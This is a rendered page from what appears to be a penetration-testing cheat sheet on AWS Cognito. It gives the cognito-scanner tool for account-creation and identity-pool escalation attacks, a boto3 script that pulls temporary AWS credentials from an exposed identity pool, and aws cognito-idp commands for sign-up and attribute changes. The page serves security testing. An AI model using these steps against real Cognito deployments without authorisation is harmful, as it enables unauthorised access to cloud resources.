aws-cognito.md (3246B)
1 --- 2 title: "AWS - Service - Cognito" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/aws/aws-cognito.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/aws/aws-cognito.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # AWS - Service - Cognito 12 13 AWS Cognito is an AWS-managed service for authentication, authorization, and user management. 14 15 1. A user signs in through Cognito User Pools (authentication) or via a federated IdP (Google, Facebook, SAML, etc.). 16 2. Cognito Identity Pools can then exchange this identity for temporary AWS credentials (from STS — Security Token Service). 17 3. These credentials (Access Key ID, Secret Access Key, and Session Token) let the app directly call AWS services (e.g., S3, DynamoDB, API Gateway) with limited IAM roles/policies. 18 19 ## Tools 20 21 * [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. 22 23 ```ps1 24 # Installation 25 $ pip install cognito-scanner 26 # Usage 27 $ cognito-scanner --help 28 # Get information about how to use the unwanted account creation script 29 $ cognito-scanner account-creation --help 30 # For more details go to https://github.com/padok-team/cognito-scanner 31 ``` 32 33 ## Identity Pool ID 34 35 * **User Pools** : User pools allow sign-in and sign-up functionality 36 * **Identity Pools** : Identity pools allow authenticated and unauthenticated users to access AWS resources using temporary credentials 37 38 Once you have the Cognito Identity Pool Id token, you can proceed further and fetch Temporary AWS Credentials for an unauthenticated role using the identified tokens. 39 40 ```py 41 import boto3 42 43 region='us-east-1' 44 identity_pool='us-east-1:5280c436-2198-2b5a-b87c-9f54094x8at9' 45 46 client = boto3.client('cognito-identity',region_name=region) 47 _id = client.get_id(IdentityPoolId=identity_pool) 48 _id = _id['IdentityId'] 49 50 credentials = client.get_credentials_for_identity(IdentityId=_id) 51 access_key = credentials['Credentials']['AccessKeyId'] 52 secret_key = credentials['Credentials']['SecretKey'] 53 session_token = credentials['Credentials']['SessionToken'] 54 identity_id = credentials['IdentityId'] 55 print("Access Key: " + access_key) 56 print("Secret Key: " + secret_key) 57 print("Session Token: " + session_token) 58 print("Identity Id: " + identity_id) 59 ``` 60 61 ## AWS Cognito Commands 62 63 ### Get User Information 64 65 ```ps1 66 aws cognito-idp get-user --access-token $(cat access_token.txt) 67 ``` 68 69 ### Admin Authentication 70 71 ```ps1 72 aws cognito-idp admin-initiate-auth --access-token $(cat access_token) 73 ``` 74 75 ### List User Groups 76 77 ```ps1 78 aws cognito-idp admin-list-groups-for-user --username user.name@email.com --user-pool-id "Group-Name" 79 ``` 80 81 ### Sign up 82 83 ```ps1 84 aws cognito-idp sign-up --client-id <client-id> --username <username> --password <password> 85 ``` 86 87 ### Modify Attributes 88 89 ```ps1 90 aws cognito-idp update-user-attributes --access-token $(cat access_token) --user-attributes Name=<attribute>,Value=<value> 91 ``` 92 93 ## References 94 95 * [Exploiting weak configurations in Amazon Cognito - Pankaj Mouriya - April 6, 2021](https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963)